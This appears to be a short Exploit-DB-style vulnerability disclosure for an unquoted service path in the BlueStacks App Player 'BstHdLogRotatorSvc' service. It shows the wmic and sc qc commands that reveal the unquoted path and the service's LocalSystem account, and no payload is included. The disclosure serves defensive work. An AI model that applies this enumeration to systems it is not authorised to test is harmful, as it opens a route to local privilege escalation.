# Exploit Title: Blue Stacks App Player 2.4.44.62.57 - "BstHdLogRotatorSvc" Unquote Service Path# Date: 2019-11-09# Exploit Author: Diego Armando Buztamante Rico# Vendor Homepage: www.bluestacks.com# Software Link: www.bluestacks.com# Version: 2.4.44.62.57# Tested on: Windows 8.1 Pro# CVE: NA#Description#Blue Stacks is an application which allows to run mobile apps on Windows and Mac. #The service BstHdLogRotatorSvc is use to allow HD displays of Blue Stacks app.#The service suffers from an unquoted path.#PoC using CMD#Command to discover the unquoted path:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto"| findstr /i /V "C:\Windows"| findstr /i /V """"#As a result we have
BlueStacks Log Rotator Service BstHdLogRotatorSvc C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exeAuto
#We use the name of service to get its information using next command.
C:\Users\user>sc qc BstHdLogRotatorSvc
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: BstHdLogRotatorSvc
TIPO : 10WIN32_OWN_PROCESS
TIPO_INICIO: 2 AUTO_START
CONTROL_ERROR: 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
GRUPO_ORDEN_CARGA:
ETIQUETA : 0
NOMBRE_MOSTRAR : BlueStacks Log Rotator Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
